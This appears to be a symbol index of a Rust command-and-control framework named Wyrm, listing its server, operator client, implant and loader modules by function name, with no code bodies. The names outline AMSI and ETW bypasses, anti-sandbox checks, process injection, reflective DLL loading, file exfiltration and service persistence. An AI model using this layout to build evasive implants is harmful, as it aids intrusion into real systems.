  type IMAGE_DATA_DIRECTORY (line 102) | pub struct IMAGE_DATA_DIRECTORY {
  type IMAGE_EXPORT_DIRECTORY (line 109) | pub struct IMAGE_EXPORT_DIRECTORY {

FILE: c2/src/profiles.rs
  type Profile (line 13) | pub struct Profile {
    method as_staged_agent (line 68) | pub fn as_staged_agent(
  type Server (line 19) | pub struct Server {
  type Network (line 24) | pub struct Network {
  type Implant (line 35) | pub struct Implant {
  type AntiSandbox (line 48) | pub struct AntiSandbox {
  type Evasion (line 54) | pub struct Evasion {
  function parse_profile (line 178) | pub async fn parse_profile() -> io::Result<Profile> {
  function add_listeners_from_profiles (line 229) | pub fn add_listeners_from_profiles(existing: &mut HashSet<String>, p: &P...
  function add_tokens_from_profiles (line 244) | pub fn add_tokens_from_profiles(existing: &mut HashSet<String>, p: &Prof...
  function read_profile (line 255) | async fn read_profile(path: &Path) -> io::Result<Profile> {
  type ParsedExportStrings (line 280) | pub struct ParsedExportStrings {
    method empty (line 287) | fn empty() -> Self {
    method from (line 295) | fn from(plain_only: String, machine_code: String, export_proxy: String...
  function parse_exports_to_string_for_env (line 306) | pub fn parse_exports_to_string_for_env(exports: &Exports) -> ParsedExpor...
  function validate_wof_dirs (line 343) | fn validate_wof_dirs(wofs: &Vec<String>) -> Result<(), String> {

FILE: client/src/controller/build_profiles.rs
  function trigger_download (line 13) | pub fn trigger_download(filename: &str, bytes: &[u8]) {

FILE: client/src/controller/dashboard.rs
  function update_connected_agents (line 19) | pub fn update_connected_agents(

FILE: client/src/controller/mod.rs
  type BodyClass (line 11) | pub enum BodyClass {
  function wyrm_chat_history_browser_key (line 17) | pub fn wyrm_chat_history_browser_key(uid: &str) -> String {
  function apply_body_class (line 25) | pub fn apply_body_class(target: BodyClass) {
  function is_logged_in (line 40) | pub async fn is_logged_in() -> bool {
  function get_item_from_browser_store (line 45) | pub fn get_item_from_browser_store<T>(key: &str) -> anyhow::Result<T>
  function store_item_in_browser_store (line 68) | pub fn store_item_in_browser_store<T: Serialize>(key: &str, item: &T) ->...
  function delete_item_in_browser_store (line 84) | pub fn delete_item_in_browser_store(key: &str) {

FILE: client/src/main.rs
  function main (line 16) | fn main() {
  function App (line 24) | fn App() -> impl IntoView {

FILE: client/src/models/dashboard.rs
  type AgentC2MemoryNotifications (line 27) | pub type AgentC2MemoryNotifications = (String, bool, Option<Value>);
  type Agent (line 32) | pub struct Agent {
    method from (line 45) | pub fn from(
    method from_messages (line 63) | pub fn from_messages(
  type TabConsoleMessages (line 86) | pub struct TabConsoleMessages {
    method non_agent_message (line 99) | pub fn non_agent_message(event: String, message: String) -> Self {
    method from (line 122) | fn from(notification_data: NotificationForAgent) -> Self {
  type NotificationForAgent (line 112) | pub struct NotificationForAgent {
  function command_to_string (line 151) | fn command_to_string(cmd: &Command) -> String {
  type FormatOutput (line 186) | pub trait FormatOutput {
    method format_console_output (line 187) | fn format_console_output(&self) -> Vec<String>;
    method format_console_output (line 191) | fn format_console_output(&self) -> Vec<String> {
  function print_client_error (line 570) | fn print_client_error(msg: &str) -> String {
  type StripCannon (line 574) | trait StripCannon {
    method try_strip_prefix (line 575) | fn try_strip_prefix(&self) -> String;
    method try_strip_prefix (line 583) | fn try_strip_prefix(&self) -> String {
  function print_wyrm_result_string (line 595) | fn print_wyrm_result_string(encoded_data: &String) -> Vec<String> {
  type ActiveTabs (line 614) | pub struct ActiveTabs {
    method from_store (line 622) | pub fn from_store() -> Self {
    method save_to_store (line 627) | pub fn save_to_store(&self) -> anyhow::Result<()> {
    method add_tab (line 634) | pub fn add_tab(&mut self, name: &str) {
    method remove_tab (line 642) | pub fn remove_tab(&mut self, name: &str) {
  type AgentIdSplit (line 654) | pub enum AgentIdSplit {
  function get_info_from_agent_id (line 661) | pub fn get_info_from_agent_id<'a>(haystack: &'a str, needle: AgentIdSpli...
  function get_agent_tab_name (line 681) | pub fn get_agent_tab_name(haystack: &str) -> Option<String> {
  function resolve_tab_to_agent_id (line 699) | pub fn resolve_tab_to_agent_id(

FILE: client/src/models/mod.rs
  type LoginData (line 6) | pub struct LoginData {
  constant C2_STORAGE_KEY (line 12) | pub const C2_STORAGE_KEY: &str = "WYRM_C2_ADDR";
  constant TAB_STORAGE_KEY (line 13) | pub const TAB_STORAGE_KEY: &str = "WYRM_C2_TABS";

FILE: client/src/net.rs
  type IsTaskingAgent (line 14) | pub enum IsTaskingAgent {
    method has_agent_id (line 26) | pub fn has_agent_id(&self) -> Result<(), IsTaskingAgentErr> {
  type IsTaskingAgentErr (line 20) | pub enum IsTaskingAgentErr {
  type C2Url (line 35) | pub enum C2Url {
    method get (line 47) | fn get(&self) -> anyhow::Result<String> {
  function api_request (line 70) | pub async fn api_request(
  function prepare_body_data (line 119) | fn prepare_body_data(input: AdminCommand, creds: Option<(String, String)...
  function make_post (line 133) | async fn make_post(c2_url: &str, body: Value) -> Result<Response, ApiErr...
  function construct_c2_url (line 143) | fn construct_c2_url(
  type ApiError (line 185) | pub enum ApiError {
  function admin_health_check (line 193) | pub async fn admin_health_check() -> bool {

FILE: client/src/pages/build_profiles.rs
  function BuildProfilesPage (line 11) | pub fn BuildProfilesPage() -> impl IntoView {

FILE: client/src/pages/dashboard.rs
  function Dashboard (line 26) | pub fn Dashboard() -> impl IntoView {
  function ConnectedAgents (line 49) | fn ConnectedAgents(tabs: RwSignal<ActiveTabs>) -> impl IntoView {
  function MiddleTabBar (line 164) | fn MiddleTabBar() -> impl IntoView {
  function MessagePanel (line 242) | fn MessagePanel() -> impl IntoView {
  function CommandInput (line 393) | fn CommandInput() -> impl IntoView {

FILE: client/src/pages/file_upload.rs
  function FileUploadPage (line 16) | pub fn FileUploadPage() -> impl IntoView {

FILE: client/src/pages/logged_in_headers.rs
  function LoggedInHeaders (line 12) | pub fn LoggedInHeaders() -> impl IntoView {
  function extract_path (line 113) | fn extract_path() -> Option<String> {
  function create_url_path_signal (line 126) | fn create_url_path_signal() -> RwSignal<String> {

FILE: client/src/pages/login.rs
  function Login (line 12) | pub fn Login() -> impl IntoView {

FILE: client/src/pages/logout.rs
  function Logout (line 9) | pub fn Logout() -> impl IntoView {

FILE: client/src/pages/staged_resources.rs
  type StagedResourcesRowInner (line 11) | pub struct StagedResourcesRowInner {
  function StagedResourcesPage (line 18) | pub fn StagedResourcesPage() -> impl IntoView {

FILE: client/src/tasks/task_dispatch.rs
  type TaskingError (line 20) | pub enum TaskingError {
  type DispatchResult (line 34) | pub type DispatchResult = Result<Option<Vec<u8>>, TaskingError>;
  function dispatch_task (line 37) | pub async fn dispatch_task(input: String, agent: IsTaskingAgent) -> Disp...
  function dispatcher (line 66) | async fn dispatcher(tokens: Vec<&str>, raw_input: String, agent: IsTaski...

FILE: client/src/tasks/task_impl.rs
  type TaskDispatchError (line 25) | pub enum TaskDispatchError {
  function list_processes (line 36) | pub async fn list_processes(agent: &IsTaskingAgent) -> DispatchResult {
  function change_directory (line 51) | pub async fn change_directory(new_dir: &[&str], agent: &IsTaskingAgent) ...
  function kill_agent (line 68) | pub async fn kill_agent(agent: &IsTaskingAgent) -> DispatchResult {
  function kill_process (line 83) | pub async fn kill_process(agent: &IsTaskingAgent, pid: &&str) -> Dispatc...
  function copy_file (line 111) | pub async fn copy_file(raw_input: String, agent: &IsTaskingAgent) -> Dis...
  function move_file (line 144) | pub async fn move_file(raw_input: String, agent: &IsTaskingAgent) -> Dis...
  type FileOperationTarget (line 172) | pub enum FileOperationTarget {
  function remove_file (line 177) | pub async fn remove_file(
  function pull_file (line 220) | pub async fn pull_file(target: String, agent: &IsTaskingAgent) -> Dispat...
  function remove_agent (line 248) | pub async fn remove_agent(agent: &IsTaskingAgent) -> DispatchResult {
  function unknown_command (line 270) | pub fn unknown_command() -> DispatchResult {
  function set_sleep (line 286) | pub async fn set_sleep(sleep_time: &str, agent: &IsTaskingAgent) -> Disp...
  function clear_terminal (line 321) | pub async fn clear_terminal(agent: &IsTaskingAgent) -> DispatchResult {
  function pwd (line 345) | pub async fn pwd(agent: &IsTaskingAgent) -> DispatchResult {
  function export_db (line 353) | pub async fn export_db(agent: &IsTaskingAgent) -> DispatchResult {
  function dir_listing (line 361) | pub async fn dir_listing(agent: &IsTaskingAgent) -> DispatchResult {
  function show_server_time (line 369) | pub async fn show_server_time() -> DispatchResult {
  function pillage (line 399) | pub async fn pillage(agent: &IsTaskingAgent) -> DispatchResult {
  function show_help (line 415) | pub async fn show_help(agent: &IsTaskingAgent) -> DispatchResult {
  function show_help_for_command (line 471) | pub async fn show_help_for_command(agent: &IsTaskingAgent, command: &str...
  function run_powershell_command (line 545) | pub async fn run_powershell_command(args: &[&str], agent: &IsTaskingAgen...
  function file_dropper (line 569) | pub async fn file_dropper(args: &[&str], agent: &IsTaskingAgent) -> Disp...
  type RegOperationDelQuery (line 623) | pub enum RegOperationDelQuery {
  function reg_query_del (line 631) | pub async fn reg_query_del(
  function reg_add (line 701) | pub async fn reg_add(inputs: String, agent: &IsTaskingAgent) -> Dispatch...
  function dotex (line 763) | pub async fn dotex(inputs: String, agent: &IsTaskingAgent) -> DispatchRe...
  function whoami (line 799) | pub async fn whoami(agent: &IsTaskingAgent) -> DispatchResult {
  function spawn (line 807) | pub async fn spawn(raw_input: String, agent: &IsTaskingAgent) -> Dispatc...
  function run_static_wof (line 830) | pub async fn run_static_wof(agent: &IsTaskingAgent, raw_input: String) -...
  function inject (line 873) | pub async fn inject(agent: &IsTaskingAgent, raw_input: String) -> Dispat...

FILE: client/src/tasks/utils.rs
  function split_string_slices_to_n (line 31) | pub fn split_string_slices_to_n(
  type DiscardFirst (line 96) | pub enum DiscardFirst {
  function tokens_with_no_quotes (line 107) | fn tokens_with_no_quotes() {
  function tokens_with_quotes_space (line 124) | fn tokens_with_quotes_space() {
  function tokens_with_quotes (line 138) | fn tokens_with_quotes() {
  function tokens_bad_count (line 152) | fn tokens_bad_count() {
  function validate_reg_type (line 161) | pub fn validate_reg_type(input: &str, reg_type: RegType) -> Result<(), (...

FILE: implant/build.rs
  function main (line 10) | fn main() {
  function write_exports_to_build_dir (line 44) | fn write_exports_to_build_dir() {
  function build_static_wofs (line 101) | fn build_static_wofs() {
  function add_symbols (line 163) | fn add_symbols(src: &Path, ffi_builder: &mut String, lookup_builder: &mu...
  type ArgsPerFolder (line 175) | struct ArgsPerFolder {
  function parse_wof_directories (line 198) | fn parse_wof_directories() -> std::io::Result<Option<Vec<ArgsPerFolder>>> {
  function dump_symbols (line 258) | fn dump_symbols(lib: &Path) -> Option<Vec<String>> {

FILE: implant/src/anti_sandbox/memory.rs
  constant MIN_ACCEPTABLE_MEMORY (line 5) | const MIN_ACCEPTABLE_MEMORY: u64 = 4000000;
  function validate_ram_sz_or_panic (line 10) | pub fn validate_ram_sz_or_panic() {

FILE: implant/src/anti_sandbox/mod.rs
  function anti_sandbox (line 9) | pub fn anti_sandbox() {

FILE: implant/src/anti_sandbox/trig.rs
  constant MAX_WAIT_TIME_SECONDS (line 14) | const MAX_WAIT_TIME_SECONDS: u64 = 5 * 60;
  function trig_mouse_movements (line 29) | pub fn trig_mouse_movements() {
  function get_pos (line 105) | fn get_pos(point: &mut POINT, live_timer: &(Instant, Duration)) {

FILE: implant/src/comms.rs
  constant MAX_RESPONSE_SZ_BYTES (line 33) | const MAX_RESPONSE_SZ_BYTES: u64 = 1024 * 1024 * 500;
  function construct_c2_url (line 36) | pub fn construct_c2_url(implant: &Wyrm) -> String {
  function comms_http_check_in (line 77) | pub fn comms_http_check_in(implant: &mut Wyrm) -> Result<Vec<Task>, ureq...
  function http_get (line 131) | fn http_get(
  function http_post_tasks (line 149) | fn http_post_tasks(
  function generate_generic_headers (line 185) | fn generate_generic_headers(implant_id: &str, security_token: &str, ua: ...
  function read_body_with_limit (line 194) | fn read_body_with_limit(response: &mut Response<Body>) -> Result<Vec<u8>...
  function decode_tasks_stream (line 211) | pub fn decode_tasks_stream(byte_response: &[u8]) -> Vec<Task> {
  function configuration_connection (line 232) | pub fn configuration_connection(implant: &mut Wyrm) -> Result<Vec<Task>,...
  function download_file_with_uri_in_memory (line 279) | pub fn download_file_with_uri_in_memory(uri: &str, wyrm: &Wyrm) -> Resul...
  function upload_file_as_stream (line 290) | pub fn upload_file_as_stream(implant: &Wyrm, ef: &ExfiltratedFile) {
  function generate_http_agent (line 349) | fn generate_http_agent(implant: &Wyrm) -> Agent {

FILE: implant/src/entry.rs
  function start_wyrm (line 25) | pub fn start_wyrm() {
  function on_start_evasion (line 56) | fn on_start_evasion() {
  function first_check_in (line 69) | pub fn first_check_in(implant: &mut Wyrm) {

FILE: implant/src/evasion/amsi.rs
  function evade_amsi (line 24) | pub fn evade_amsi() -> bool {
  function amsi_patch_ntdll (line 49) | fn amsi_patch_ntdll() {
  function amsi_veh_squared (line 87) | fn amsi_veh_squared() -> bool {

FILE: implant/src/evasion/etw.rs
  function etw_bypass (line 12) | pub(super) fn etw_bypass() {
  function evade_etw_current_process_overwrite_ntdll (line 25) | fn evade_etw_current_process_overwrite_ntdll() -> Result<(), ExportResol...

FILE: implant/src/evasion/mod.rs
  function run_evasion (line 7) | pub fn run_evasion() {

FILE: implant/src/evasion/veh.rs
  function veh_handler (line 15) | pub(super) unsafe extern "system" fn veh_handler(p_ep: *mut EXCEPTION_PO...
  function addr_of_amsi_scan_buf (line 67) | pub(super) fn addr_of_amsi_scan_buf() -> Option<*const c_void> {

FILE: implant/src/execute/dotnet.rs
  type DotnetError (line 28) | pub enum DotnetError {
    method to_string (line 44) | fn to_string(&self) -> String {
  constant GUID_META_HOST (line 111) | const GUID_META_HOST: GUID = GUID {
  constant GUID_RIID (line 118) | const GUID_RIID: GUID = GUID {
  constant GUID_RNTIME_INFO (line 125) | const GUID_RNTIME_INFO: GUID = GUID {
  constant GUID_COR_RUNTIME (line 132) | const GUID_COR_RUNTIME: GUID = GUID {
  constant GUID_APP_DOMAIN (line 139) | const GUID_APP_DOMAIN: GUID = GUID {
  function execute_dotnet_current_process (line 150) | pub fn execute_dotnet_current_process(metadata: &Option<String>) -> Wyrm...
  function execute_dotnet_assembly (line 175) | fn execute_dotnet_assembly(buf: &[u8], args: &[String]) -> Result<String...
  function make_params (line 250) | fn make_params(args: &[String]) -> Result<*mut SAFEARRAY, DotnetError> {
  function args_to_safe_array (line 291) | fn args_to_safe_array(args: &[String]) -> Result<*mut SAFEARRAY, DotnetE...
  function create_safe_array (line 329) | fn create_safe_array(buf: &[u8]) -> Result<*mut SAFEARRAY, DotnetError> {
  function create_clr_instance (line 350) | fn create_clr_instance() -> Result<*mut ICLRMetaHost, DotnetError> {
  function get_runtime_v4 (line 362) | fn get_runtime_v4(meta: *mut ICLRMetaHost) -> Result<*mut ICLRRuntimeInf...
  function get_cor_runtime_host (line 376) | fn get_cor_runtime_host(
  function start_runtime (line 390) | fn start_runtime(host: *mut ICorRuntimeHost) -> Result<(), DotnetError> {
  function get_default_appdomain (line 401) | fn get_default_appdomain(host: *mut ICorRuntimeHost) -> Result<*mut _App...

FILE: implant/src/execute/ffi.rs
  type IUnknownVtbl (line 12) | pub struct IUnknownVtbl {
  type IUnknown (line 23) | pub struct IUnknown {
  type ICLRMetaHostVtbl (line 28) | pub struct ICLRMetaHostVtbl {
  type ICLRMetaHost (line 46) | pub struct ICLRMetaHost {
  type ICorRuntimeHost (line 51) | pub struct ICorRuntimeHost {
  type ICorRuntimeHostVtbl (line 56) | pub struct ICorRuntimeHostVtbl {
  type ICLRRuntimeInfo (line 117) | pub struct ICLRRuntimeInfo {
  type ICLRRuntimeInfoVtbl (line 122) | pub struct ICLRRuntimeInfoVtbl {
  type _AppDomain (line 184) | pub struct _AppDomain {
  type _AppDomainVtbl (line 189) | pub struct _AppDomainVtbl {
  type _Assembly (line 267) | pub struct _Assembly {
  type _AssemblyVtbl (line 272) | pub struct _AssemblyVtbl {
  type _MethodInfo (line 335) | pub struct _MethodInfo {
  type _MethodInfoVtbl (line 340) | pub struct _MethodInfoVtbl {

FILE: implant/src/lib.rs
  function DllMain (line 33) | unsafe extern "system" fn DllMain(_hmod_instance: HINSTANCE, dw_reason: ...
  function Start (line 45) | unsafe extern "system" fn Start() {

FILE: implant/src/main.rs
  function main (line 25) | fn main() {

FILE: implant/src/main_svc.rs
  function ServiceMain (line 56) | pub unsafe extern "system" fn ServiceMain(_: u32, _: *mut PWSTR) {
  function svc_start (line 60) | fn svc_start() {
  function service_handler (line 76) | unsafe extern "system" fn service_handler(control: u32) {
  function main (line 86) | fn main() {

FILE: implant/src/native/accounts.rs
  function get_logged_in_username (line 33) | pub fn get_logged_in_username() -> Option<impl Serialize> {
  type ProcessIntegrityLevel (line 58) | pub enum ProcessIntegrityLevel {
  method fmt (line 68) | fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
  function get_process_integrity_level (line 80) | pub fn get_process_integrity_level() -> Option<ProcessIntegrityLevel> {
  function whoami (line 147) | pub fn whoami() -> Option<impl Serialize> {
  function format_token_permissions (line 248) | fn format_token_permissions(h_tok: *mut c_void) -> WyrmResult<String> {
  function luid_to_name (line 299) | fn luid_to_name(luid: &LUID) -> String {
  function attrs_to_state (line 324) | fn attrs_to_state(attrs: u32) -> &'static str {
  function lookup_account_sid_w (line 336) | fn lookup_account_sid_w(psid: PSID) -> Result<(String, String), u32> {

FILE: implant/src/native/filesystem.rs
  function pillage (line 18) | pub fn pillage() -> Option<impl Serialize> {
  function get_file_listings_from_dir_and_subdirs (line 36) | fn get_file_listings_from_dir_and_subdirs(
  function dir_listing (line 98) | pub fn dir_listing(cwd: &Path) -> Option<impl Serialize + use<>> {
  type MoveCopyAction (line 140) | pub enum MoveCopyAction {
  function move_or_copy_file (line 148) | pub fn move_or_copy_file(
  function rm_from_fs (line 217) | pub fn rm_from_fs(
  function drop_file_to_disk (line 259) | pub fn drop_file_to_disk(
  function change_directory (line 302) | pub fn change_directory(
  type PathParseType (line 353) | pub enum PathParseType {
  function parse_path (line 360) | pub fn parse_path(
  function pull_file (line 464) | pub fn pull_file(

FILE: implant/src/native/processes.rs
  function running_process_details (line 31) | pub fn running_process_details() -> Option<impl Serialize> {
  function get_pids (line 45) | fn get_pids() -> Result<Vec<u32>, u32> {
  function lookup_process_name (line 93) | fn lookup_process_name(handle: HANDLE, pid: u32) -> String {
  function lookup_process_owner_name (line 121) | fn lookup_process_owner_name(pid: u32) -> String {
  function kill_process (line 247) | pub fn kill_process(pid: &Task) -> Option<WyrmResult<String>> {
  function enum_all_processes (line 279) | fn enum_all_processes() -> Option<Vec<Process>> {

FILE: implant/src/native/registry.rs
  function reg_query (line 14) | pub fn reg_query(raw_input: &Option<String>) -> Option<impl Serialize> {
  function reg_del (line 45) | pub fn reg_del(raw_input: &Option<String>) -> Option<impl Serialize> {
  function reg_add (line 72) | pub fn reg_add(raw_input: &Option<String>) -> Option<impl Serialize> {
  function query_key_plus_value (line 177) | fn query_key_plus_value(path: String, value: String) -> Option<WyrmResul...
  function query_key (line 217) | fn query_key(path: String) -> Option<WyrmResult<String>> {
  function value_to_string (line 283) | fn value_to_string(data: &Value) -> String {
  function val_u32_to_str (line 295) | fn val_u32_to_str(value: &Value) -> String {
  function val_u64_to_str (line 299) | fn val_u64_to_str(value: &Value) -> String {
  function val_bytes_to_str (line 303) | fn val_bytes_to_str(value: &Value) -> String {
  function val_string_to_str (line 316) | fn val_string_to_str(value: &[u8]) -> String {
  function strip_hive (line 325) | fn strip_hive<'a>(path: &'a str) -> Result<&'a str, RegistryError> {
  function extract_hive_from_str (line 335) | fn extract_hive_from_str<'a>(path: &'a str) -> Result<&'a Key, RegistryE...
  type RegistryError (line 356) | pub enum RegistryError {
  function get_key_strip_hive (line 360) | fn get_key_strip_hive<'a>(path: &'a str) -> Option<(&'a Key, &'a str)> {
  function delete_key (line 376) | fn delete_key(path: String) -> Option<WyrmResult<String>> {
  function delete_reg_value (line 399) | fn delete_reg_value(path: String, value: String) -> Option<WyrmResult<St...

FILE: implant/src/native/shell.rs
  function run_powershell (line 8) | pub fn run_powershell(command: &Option<String>, implant: &Wyrm) -> Optio...

FILE: implant/src/spawn_inject/early_cascade.rs
  function early_cascade_spawn_child (line 29) | pub(super) fn early_cascade_spawn_child(mut buf: Vec<u8>, spawn_as: &str...
  function execute_early_cascade (line 174) | fn execute_early_cascade(
  function write_image_rw (line 241) | fn write_image_rw(h_process: HANDLE, buf: &mut Vec<u8>) -> Result<*const...
  function encode_system_ptr (line 285) | fn encode_system_ptr(ptr: *const c_void) -> *const c_void {

FILE: implant/src/spawn_inject/injection.rs
  function virgin_inject (line 23) | pub fn virgin_inject(buf: &[u8], pid: u32) -> WyrmResult<String> {

FILE: implant/src/spawn_inject/mod.rs
  type SpawnMethod (line 10) | pub enum SpawnMethod {
  type InjectMethod (line 14) | pub enum InjectMethod {
  type Inject (line 19) | pub struct Inject;
    method inject_wyrm (line 22) | pub fn inject_wyrm(buf: &[u8], method: InjectMethod, pid: u32) -> Wyrm...
  type Spawn (line 29) | pub struct Spawn;
    method spawn_child (line 32) | pub fn spawn_child(buf: Vec<u8>, method: SpawnMethod, spawn_as: &str) ...

FILE: implant/src/stubs/rdi.rs
  type VirtualAlloc (line 43) | type VirtualAlloc = unsafe extern "system" fn(
  type LoadLibraryA (line 50) | type LoadLibraryA = unsafe extern "system" fn(PCSTR) -> HMODULE;
  type VirtualProtect (line 52) | type VirtualProtect = unsafe extern "system" fn(
  type GetProcAddress (line 59) | type GetProcAddress = unsafe extern "system" fn(HMODULE, PCSTR) -> FARPROC;
  type FlushInstructionCache (line 61) | type FlushInstructionCache =
  type GetCurrentProcess (line 64) | type GetCurrentProcess = unsafe extern "system" fn() -> HANDLE;
  type RdiExports (line 68) | struct RdiExports {
    method new (line 84) | fn new() -> Option<Self> {
  type RdiErrorCodes (line 144) | enum RdiErrorCodes {
  function Load (line 156) | pub unsafe extern "system" fn Load(image_base: *mut c_void) -> u32 {
  function relocate_and_commit (line 259) | fn relocate_and_commit(
  function process_relocations (line 335) | fn process_relocations(
  function patch_iat (line 412) | fn patch_iat(
  function get_addr_as_rva (line 486) | fn get_addr_as_rva<T>(base_ptr: *mut u8, offset: usize) -> *mut T {
  function write_payload (line 491) | fn write_payload(
  function nostd_patch_etw_current_process (line 533) | fn nostd_patch_etw_current_process(exports: &RdiExports) {
  function calculate_image_base (line 565) | fn calculate_image_base() -> Option<*mut c_void> {
  function is_valid_pe_base (line 585) | fn is_valid_pe_base(addr: usize) -> bool {

FILE: implant/src/stubs/shim.rs
  type ShimHardReturnErrors (line 11) | enum ShimHardReturnErrors {
  type NtQueueApcThread (line 18) | type NtQueueApcThread = unsafe extern "system" fn(
  function Shim (line 30) | pub extern "system" fn Shim() -> u32 {

FILE: implant/src/utils/allocate.rs
  type ProcessHeapAlloc (line 6) | pub struct ProcessHeapAlloc;
  method alloc (line 9) | unsafe fn alloc(&self, layout: Layout) -> *mut u8 {
  method alloc_zeroed (line 12) | unsafe fn alloc_zeroed(&self, layout: Layout) -> *mut u8 {
  method dealloc (line 15) | unsafe fn dealloc(&self, ptr: *mut u8, _layout: Layout) {
  method realloc (line 20) | unsafe fn realloc(&self, ptr: *mut u8, _layout: Layout, new_size: usize)...

FILE: implant/src/utils/comptime.rs
  type SleepSeconds (line 7) | pub type SleepSeconds = u64;
  type ApiEndpoint (line 8) | pub type ApiEndpoint = Vec<String>;
  type SecurityToken (line 9) | pub type SecurityToken = String;
  type Useragent (line 10) | pub type Useragent = String;
  type Port (line 11) | pub type Port = u16;
  type URL (line 12) | pub type URL = String;
  type AgentNameByOperator (line 13) | pub type AgentNameByOperator = String;
  type Jitter (line 14) | pub type Jitter = u64;
  type WinGlobalMutex (line 15) | pub type WinGlobalMutex = String;
  type SpawnAs (line 16) | pub type SpawnAs = String;
  constant SPAWN_AS_IMAGE_FALLBACK (line 18) | const SPAWN_AS_IMAGE_FALLBACK: &str = "C:\\Windows\\System32\\svchost.exe";
  function translate_build_artifacts (line 22) | pub fn translate_build_artifacts() -> (

FILE: implant/src/utils/console.rs
  function get_console_log (line 26) | pub fn get_console_log() -> &'static Mutex<Vec<u8>> {
  function init_agent_console (line 30) | pub fn init_agent_console() {
  function start_stdout_reader_thread (line 76) | fn start_stdout_reader_thread() {
  function thread_loop (line 80) | unsafe extern "system" fn thread_loop(_: *mut c_void) -> u32 {
  function print_success (line 134) | pub fn print_success(msg: impl Display) {
  function print_info (line 139) | pub fn print_info(msg: impl Display) {
  function print_failed (line 144) | pub fn print_failed(msg: impl Display) {

FILE: implant/src/utils/export_comptime.rs
  function internal_dll_start (line 33) | pub fn internal_dll_start(start_type: StartType) {
  function start_in_os_thread_no_mutex_check (line 57) | fn start_in_os_thread_no_mutex_check() {
  function runpoline (line 68) | unsafe extern "system" fn runpoline(_p1: *mut c_void) -> u32 {
  function start_in_os_thread_mutex_check (line 74) | fn start_in_os_thread_mutex_check() {
  function check_mutex (line 84) | fn check_mutex() -> Option<()> {
  type StartType (line 103) | pub enum StartType {

FILE: implant/src/utils/pe_stomp.rs
  function stomp_pe_header_bytes (line 5) | pub fn stomp_pe_header_bytes(buf: &mut Vec<u8>) {

FILE: implant/src/utils/proxy.rs
  type ProxyConfig (line 18) | pub struct ProxyConfig {
  type ProxyError (line 23) | pub enum ProxyError {
  function resolve_web_proxy (line 33) | pub fn resolve_web_proxy(implant: &Wyrm) -> Result<Option<ProxyConfig>, ...
  function global_free (line 227) | fn global_free(p: *mut c_void) {
  function winhttp_proxy_to_url (line 233) | fn winhttp_proxy_to_url(raw: &str, target_is_https: bool) -> Option<Stri...

FILE: implant/src/utils/strings.rs
  function utf_16_to_string_lossy (line 9) | pub unsafe fn utf_16_to_string_lossy(p_w_str: *const u16, num_chars: usi...
  function generate_mutex_name (line 20) | pub fn generate_mutex_name(mutex: &str) -> [u8; MAX_PATH as usize] {

FILE: implant/src/utils/svc_controls.rs
  function update_service_status (line 24) | pub unsafe fn update_service_status(h_status: SERVICE_STATUS_HANDLE, sta...
  function stop_svc_and_exit (line 42) | pub fn stop_svc_and_exit() -> ! {

FILE: implant/src/utils/time_utils.rs
  function epoch_now (line 3) | pub fn epoch_now() -> i64 {

FILE: implant/src/wofs/mod.rs
  type FfiShape (line 9) | type FfiShape = unsafe extern "C" fn(*const c_void) -> i32;
  function get_wof_fn_ptr (line 11) | fn get_wof_fn_ptr(needle: &str) -> Option<FfiShape> {
  function call_static_wof_no_arg (line 24) | pub fn call_static_wof_no_arg(fn_name: &str) -> WyrmResult<String> {
  function call_static_wof_with_arg (line 39) | pub fn call_static_wof_with_arg(fn_name: &str, arg: &str) -> WyrmResult<...

FILE: implant/src/wyrm.rs
  type RetriesBeforeExit (line 61) | pub struct RetriesBeforeExit {
  type Wyrm (line 68) | pub struct Wyrm {
    method new (line 98) | pub fn new() -> Self {
    method get_tasks_http (line 160) | pub fn get_tasks_http(&mut self) {
    method dispatch_tasks (line 177) | pub fn dispatch_tasks(&mut self) {
    method update_sleep_time (line 410) | fn update_sleep_time(&mut self, time_as_string: Option<String>) {
    method push_completed_task (line 450) | pub fn push_completed_task<T>(&mut self, task: &Task, data: Option<T>)
    method update_implant_sleep_time (line 502) | fn update_implant_sleep_time(&mut self, task: Task) {
    method conduct_first_run_recon (line 518) | pub fn conduct_first_run_recon(&mut self) {
    method try_get_proxy (line 563) | pub fn try_get_proxy(&self) -> Option<String> {
  type C2Config (line 86) | pub struct C2Config {
  function build_implant_id (line 574) | fn build_implant_id() -> String {
  function get_hostname (line 620) | pub fn get_hostname() -> String {
  function calculate_sleep_seconds (line 633) | pub fn calculate_sleep_seconds(wyrm: &Wyrm) -> u64 {
  type WyrmMutex (line 674) | struct WyrmMutex {
    method new (line 687) | fn new(mtx_name: &str) -> Option<Self> {
  method drop (line 745) | fn drop(&mut self) {

FILE: loader/build.rs
  constant ENCRYPTION_KEY (line 9) | const ENCRYPTION_KEY: u8 = 0x90;
  function main (line 11) | fn main() {
  function prepare_wyrm_dll (line 36) | fn prepare_wyrm_dll() {
  function write_exports_to_build_dir (line 72) | fn write_exports_to_build_dir() {

FILE: loader/src/export_comptime.rs
  function internal_dll_start (line 31) | pub fn internal_dll_start(start_type: StartType) {
  function start_in_os_thread_no_mutex_check (line 46) | fn start_in_os_thread_no_mutex_check() {
  function start_in_os_thread_mutex_check (line 57) | fn start_in_os_thread_mutex_check() {
  function runpoline (line 66) | unsafe extern "system" fn runpoline(_p1: *mut c_void) -> u32 {
  type StartType (line 73) | pub enum StartType {
  function check_mutex (line 79) | fn check_mutex() -> Option<()> {

FILE: loader/src/injector.rs
  constant DLL_BYTES (line 16) | const DLL_BYTES: &[u8] = include_bytes!(concat!(env!("OUT_DIR"), "/rdll_...
  constant ENCRYPTION_KEY (line 17) | const ENCRYPTION_KEY: u8 = 0x90;
  function inject_current_process (line 20) | pub fn inject_current_process() {
  function find_export_address (line 71) | fn find_export_address(
  function rva_from_file (line 121) | unsafe fn rva_from_file<T>(

FILE: loader/src/lib.rs
  function panic (line 14) | fn panic(_info: &core::panic::PanicInfo) -> ! {
  function DllMain (line 20) | unsafe extern "system" fn DllMain(_hmod_instance: HINSTANCE, dw_reason: ...

FILE: loader/src/main.rs
  function panic (line 11) | fn panic(_info: &core::panic::PanicInfo) -> ! {
  function main (line 16) | pub extern "C" fn main() -> i32 {

FILE: loader/src/main_svc.rs
  function panic (line 24) | fn panic(_info: &core::panic::PanicInfo) -> ! {
  function get_service_name_wide (line 30) | fn get_service_name_wide() -> [u16; 256] {
  function ServiceMain (line 49) | pub unsafe extern "system" fn ServiceMain(_: u32, _: *mut PWSTR) {
  function svc_start (line 53) | fn svc_start() {
  function service_handler (line 68) | unsafe extern "system" fn service_handler(control: u32) {
